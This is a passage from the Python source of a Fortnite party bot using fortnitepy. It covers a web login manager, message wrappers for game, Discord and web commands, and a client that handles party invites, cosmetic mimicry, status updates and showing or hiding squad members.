print('Failed to load third party library. Please run INSTALL.bat. If the issue is not resolved, contact me\nTwitter @gomashio1596\nDiscord gomashio#4335\nor please join support Discord server\nhttps://discord.gg/NEnka5N')
sys.exit(1)
if sys.platform == 'win32':
asyncio.set_event_loop(asyncio.ProactorEventLoop())
else:
try:
import uvloop
except ModuleNotFoundError:
pass
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
if True: #Classes
class PartyPrivacy(Enum):
PUBLIC = {
'partyType': 'Public',
'inviteRestriction': 'AnyMember',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Anyone',
'invitePermission': 'Anyone',
'acceptingMembers': True,
}
FRIENDS = {
'partyType': 'FriendsOnly',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Leader',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
PRIVATE_ALLOW_FRIENDS_OF_FRIENDS = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': False,
'presencePermission': 'Noone',
'invitePermission': 'Anyone',
'acceptingMembers': False,
}
PRIVATE = {
'partyType': 'Private',
'inviteRestriction': 'LeaderOnly',
'onlyLeaderFriendsCanJoin': True,
'presencePermission': 'Noone',
'invitePermission': 'Leader',
'acceptingMembers': False,
}
class bool_:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True}
return d.get(content.lower(), False)
class bool_none:
@classmethod
def create(cls, content: str) -> bool:
d = {"false": False, "true": True, "none": None}
return d.get(content.lower(), False)
class select:
def __init__(self, content: List[dict]) -> None:
self.content = content
class Red:
pass
class FixRequired:
pass
class CanLinebreak:
pass
class LoginManager:
def __init__(self) -> None:
self.id_len = 64
self.expire_time = datetime.timedelta(minutes=10)
self.expires = {}
self.cookie_key = "X-SessionId"
self.no_auth_handler_ = sanic.response.html("Unauthorized")
def generate_id(self, request: Request) -> str:
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
while Id in self.expires.keys():
Id = "".join(random.choices(string.ascii_letters + string.digits, k=self.id_len))
return Id
def authenticated(self, request: Request) -> bool:
if data["web"]["login_required"]:
Id = request.cookies.get(self.cookie_key)
if not Id:
return False
elif Id in self.expires.keys():
return True
else:
return False
else:
return True
def login_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = self.generate_id(request)
response.cookies[self.cookie_key] = Id
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def logout_user(self, request: Request, response: Type[sanic.response.BaseHTTPResponse]) -> None:
Id = request.cookies.get(self.cookie_key)
if Id:
del response.cookies[self.cookie_key]
self.expires[Id] = datetime.datetime.utcnow() + self.expire_time
def login_required(self, func: Callable):
@wraps(func)
def deco(*args: Any, **kwargs: Any):
request = args[0]
if self.authenticated(request):
return func(*args, **kwargs)
elif isinstance(self.no_auth_handler_, sanic.response.BaseHTTPResponse):
return self.no_auth_handler_
elif callable(self.no_auth_handler_):
return self.no_auth_handler_(*args, **kwargs)
return deco
def no_auth_handler(self, func: Callable):
if asyncio.iscoroutinefunction(func) is False:
raise ValueError("Function must be a coroutine")
self.no_auth_handler_ = func
@wraps(func)
def deco(*args: Any, **kwargs: Any):
return func(*args, **kwargs)
return deco
class WebUser:
def __init__(self, sessionId: str) -> None:
self._id = sessionId
@property
def display_name(self) -> None:
return "WebUser"
@property
def id(self) -> None:
return self._id
class WebMessage:
def __init__(self, content: str, sessionId: str, client: fortnitepy.Client) -> None:
self._sessionId = sessionId
self._content = content
self._client = client
self._author = WebUser(self._sessionId)
self._messages = []
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> Type[fortnitepy.Client]:
return self._client
@property
def result(self) -> str:
return self._messages
def reply(self, content: str) -> None:
self._messages.append(content)
class AllMessage:
def __init__(self,
content: str,
author: Union[fortnitepy.user.UserBase, discord.abc.User, WebUser],
client: fortnitepy.Client,
base: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]
) -> None:
self._content = content
self._author = author
self._client = client
self._base = base
self._messages = {}
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def base(self) -> Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]:
return self._base
@property
def result(self) -> str:
return self._messages
def reply(self, content: str, client: fortnitepy.Client) -> None:
if not self._messages.get(client.user.id):
self._messages[client.user.id] = []
self._messages[client.user.id].append(content)
class CanBeMultiple:
pass
class Client(fortnitepy.Client):
def __init__(self, emote: str, **kwargs: Any) -> None:
self.email = email
self.status_ = data['fortnite']['status']
self.eid = emote
self.boot_time = None
self.booted_utc = None
self.isready = False
self.booting = False
self.timer = None
self.acceptinvite_interval = True
self.stopcheck = False
self.outfitlock = False
self.backpacklock = False
self.pickaxelock = False
self.emotelock = False
self.owner = []
self.prevmessage = {}
self.select = {}
self.visual_members = []
self.invitelist = []
self.whisper = data['fortnite']['whisper']
self.partychat = data['fortnite']['partychat']
self.discord = data['discord']['discord']
self.web = data['web']['web']
self.whisperperfect = data['fortnite']['disablewhisperperfectly']
self.partychatperfect = data['fortnite']['disablepartychatperfectly']
self.discordperfect = data['discord']['disablediscordperfectly']
self.joinmessageenable = data['fortnite']['joinmessageenable']
self.randommessageenable = data['fortnite']['randommessageenable']
self.outfitmimic = data['fortnite']['outfitmimic']
self.backpackmimic = data['fortnite']['backpackmimic']
self.pickaxemimic = data['fortnite']['pickaxemimic']
self.emotemimic = data['fortnite']['emotemimic']
self.outfitlock = data['fortnite']['outfitlock']
self.backpacklock = data['fortnite']['backpacklock']
self.pickaxelock = data['fortnite']['pickaxelock']
self.emotelock = data['fortnite']['emotelock']
self.acceptinvite = data['fortnite']['acceptinvite']
self.acceptfriend = data['fortnite']['acceptfriend']
super().__init__(**kwargs)
def get_cache_user(self, user: str) -> Optional[fortnitepy.User]:
if self.is_id(user):
users = {i.id: i for i in cache_users.values()}
else:
users = cache_users
return users.get(user)
def add_cache(self, user: fortnitepy.user.UserBase) -> None:
try:
if isinstance(user, fortnitepy.user.UserBase) and user.id:
if isinstance(user, fortnitepy.User):
if user.display_name:
cache_users[user.display_name] = user
else:
user = self.get_user(user.id)
if user and user.display_name:
cache_users[user.display_name] = user
except Exception:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
def inviteaccept(self) -> None:
send(name(self.user),l("inviteaccept"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite = True
def inviteinterval(self) -> None:
send(name(self.user),l("inviteinterval"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite_interval = True
def lock_check(self, author_id: str) -> bool:
if author_id in [client.user.id for client in loadedclients]:
return False
elif author_id in [owner.id for owner in self.owner]:
return False
elif data['fortnite']['whitelist-ignorelock'] and author_id in whitelist:
return False
elif author_id in [owner.id for owner in dclient.owner]:
return False
elif data['discord']['whitelist-ignorelock'] and author_id in whitelist_:
return False
return True
def is_most(self) -> None:
name = self.user.display_name
member_joined_at_most = [self.user.id, getattr(getattr(self.party,"me",None),"joined_at",datetime.datetime.now())]
for member_ in self.party.members:
self.add_cache(member_)
if member_.id in [i.user.id for i in loadedclients]:
if member_.id != self.user.id:
name += f"/{str(member_.display_name)}"
if member_.joined_at < member_joined_at_most[1]:
member_joined_at_most = [member_.id, getattr(member_, "joined_at", datetime.datetime.now())]
if self.user.id == member_joined_at_most[0]:
return name
return None
def get_client_data(self) -> defaultdict:
var = defaultdict(lambda: None)
if not self.isready:
return var
party = getattr(self,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(self.friends),
"pending_count": len(self.pending_friends),
"incoming_pending_count": len(self.incoming_pending_friends),
"outgoing_pending_count": len(self.outgoing_pending_friends),
"block_count": len(self.blocked_users),
"display_name": self.user.display_name,
"id": self.user.id,
"boot_time": int(time.time() - self.boot_time),
"client": self,
"whitelist": whitelist,
"whitelist_": whitelist_,
"blacklist": blacklist,
"blacklist_": blacklist_
}
)
return var
async def change_status(self) -> None:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_incoming_pending_count": sum([len(client_.incoming_pending_friends) for client_ in clients]),
"all_outgoing_pending_count": sum([len(client_.outgoing_pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients])
}
)
if data['discord']['enabled'] and dclient.isready:
var.update(
{
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"dclient": dclient
}
)
party = getattr(self,"party",None)
if party:
status = eval_format(self.status_,var)
self.status = status
status = self.party.construct_presence(status)
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
status = eval_format(self.status_,var)
self.status = status
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def status_loop(self) -> None:
while True:
try:
await self.change_status()
except Exception:
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
async def invitation_accept(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
try:
await invitation.accept()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_already_member_of_party"))
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(name(self.user),l("already_member_of_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("user_notfound"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("user_notfound"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['ingame-error']:
await invitation.sender.send(l("error_private_party"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_private_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_accepting_partyinvite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_accepting_partyinvite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
self.acceptinvite_interval = False
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['inviteinterval']:
try:
self.timer.cancel()
except Exception:
pass
self.acceptinvite_interval = False
self.timer = Timer(data['fortnite']['interval'], self.inviteinterval)
self.timer.start()
if data['loglevel'] == 'normal':
send(name(self.user),l("accepted_invite_from", name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(name(self.user),f'{l("accepted_invite_from2", f"{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id)}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def invitation_decline(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_from", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_from2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_interval(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_interval3", str(data["fortnite"]["interval"])))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_interval", str(invitation.sender.display_name), str(data["fortnite"]["interval"])),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_interval2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id, str(data["fortnite"]["interval"])),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_owner(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_owner3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_owner", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_owner2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_whitelist(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_whitelist3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_whitelist", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_whitelist2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def change_asset(self, author_id: str, type_: str, id_: str, variants: Optional[list] = [], enlightenment: Optional[Union[tuple, list]] = None, corruption: Optional[float] = None) -> None:
if not enlightenment:
enlightenment = None
if type_ == "Outfit":
if self.outfitlock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaCharacter", profile_banner='ProfileBanner')
if not variants:
variants = None
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=id_, variants=variants, enlightenment=enlightenment, corruption=corruption))
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif type_ == "Back Bling":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=id_, variants=variants, enlightenment=enlightenment, corruption=corruption))
elif type_ == "Pet":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_pet, asset=id_, variants=variants))
elif type_ == "Harvesting Tool":
if self.pickaxelock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants += self.party.me.create_variants(item="AthenaPickaxe", profile_banner='ProfileBanner')
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, asset=id_, variants=variants))
await self.party.me.set_emote("EID_IceKing")
elif type_ == "Emote":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
if "holidaycracker" in id_.lower():
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/HolidayCracker/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif id_.lower().endswith("papayacomms"):
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/PapayaComms/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
else:
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Emoticon":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Dances/Emoji/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Toy":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Toys/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
return True
async def disable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('None')
await client.party.patch(updated=prop)
async def enable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('VivoxVoiceChat')
await client.party.patch(updated=prop)
async def hide(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
num = 0
squad_assignments = [{"memberId": self.user.id, "absoluteMemberIdx": num}]
num += 1
if data['fortnite']['show-owner']:
for owner in self.owner:
if self.party.get_member(owner.id):
squad_assignments.append({"memberId": owner.id, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-whitelist']:
for whitelistuser in whitelist:
if self.party.get_member(whitelistuser):
squad_assignments.append({"memberId": whitelistuser, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-bot']:
for botuser in (otherbotlist + [i.user.id for i in loadedclients]):
if self.party.get_member(botuser):
squad_assignments.append({"memberId": botuser, "absoluteMemberIdx": num})
num += 1
else:
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
squad_assignments = self.visual_members
for squad in squad_assignments:
if squad["memberId"] == member.id:
squad_assignments.remove(squad)
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def show(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
member_indexes = [member.position for member in self.party.members if isinstance(member.position,int)]
available_indexes = [num for num in range(15) if num not in member_indexes]
num = 0
squad_assignments = []
for member in self.party.members:
if isinstance(member.position,int):
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": member.position
}
)
else:
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": available_indexes[num]
}
)
num += 1
else:
squad_assignments = self.visual_members
squad_members = [member["memberId"] for member in squad_assignments]
member_indexes = [member["absoluteMemberIdx"] for member in squad_assignments]
available_indexes = [num for num in range(15) if num not in member_indexes]
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
if member.id not in squad_members:
squad_assignments.append({"memberId": member.id, "absoluteMemberIdx": available_indexes[0]})
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def party_member_outfit_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.outfitmimic,bool) and self.outfitmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.outfitmimic,str) and member.id == self.outfitmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"outfit"):
send(display_name_,f"CID: {member_asset(member,'outfit')}")
if flag:
if not member_asset(member,"outfit"):
try:
await self.change_asset(self.user.id, "Outfit", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Outfit", member_asset(member,"outfit"), member.outfit_variants, member.enlightenments, member.corruption)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_backpack_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.backpackmimic,bool) and self.backpackmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.backpackmimic,str) and member.id == self.backpackmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"backpack"):
send(display_name_,f"BID: {member_asset(member,'backpack')}")
if flag:
if not member_asset(member,"backpack"):
try:
await self.change_asset(self.user.id, "Back Bling", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,'backpack'))
await self.change_asset(self.user.id, type_, member_asset(member,"backpack"), member.backpack_variants, member.enlightenments, member.corruption)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_pickaxe_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.pickaxemimic,bool) and self.pickaxemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.pickaxemimic,str) and member.id == self.pickaxemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"pickaxe"):
send(display_name_,f"Pickaxe_ID: {member_asset(member,'pickaxe')}")
if flag:
if not member_asset(member,"pickaxe"):
try:
await self.change_asset(self.user.id, "Harvesting Tool", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Harvesting Tool", member_asset(member,"pickaxe"), member.pickaxe_variants)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_emote_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.emotemimic,bool) and self.emotemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.emotemimic,str) and member.id == self.emotemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"emote"):
send(display_name_,f"EID: {member_asset(member,'emote')}")
if flag:
if not member_asset(member,"emote"):
try:
await self.change_asset(self.user.id, "Emote", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,"emote"))
await self.change_asset(self.user.id, type_, member_asset(member,"emote"))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
#Events
async def event_device_auth_generate(self, details: dict, email: str) -> None:
store_device_auth_details(email, details)
async def event_ready(self) -> None:
global first_boot
loop = asyncio.get_event_loop()
self.boot_time = time.time()
self.booted_utc = datetime.datetime.utcnow()
display_name = name(self.user)
send(display_name,f'{l("login")}: {display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
flag = False
if first_boot:
first_boot = False
flag = True
self.isready = True
self.booting = False
if not self.visual_members:
if self.party:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members = [{"memberId": self.user.id, "absoluteMemberIdx": 0}]
loadedclients.append(self)
client_name[self.user.display_name] = self
self.add_cache(self.user)
for user in [list(self.friends) + list(self.pending_friends) + list(self.blocked_users)]:
self.add_cache(user)
loop.create_task(self.status_loop())
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
self.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=self.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
self.owner = []
for owner in data['fortnite']['owner']:
user = self.get_user(owner) or self.get_cache_user(owner)
if not user:
try:
user = await self.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id):
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
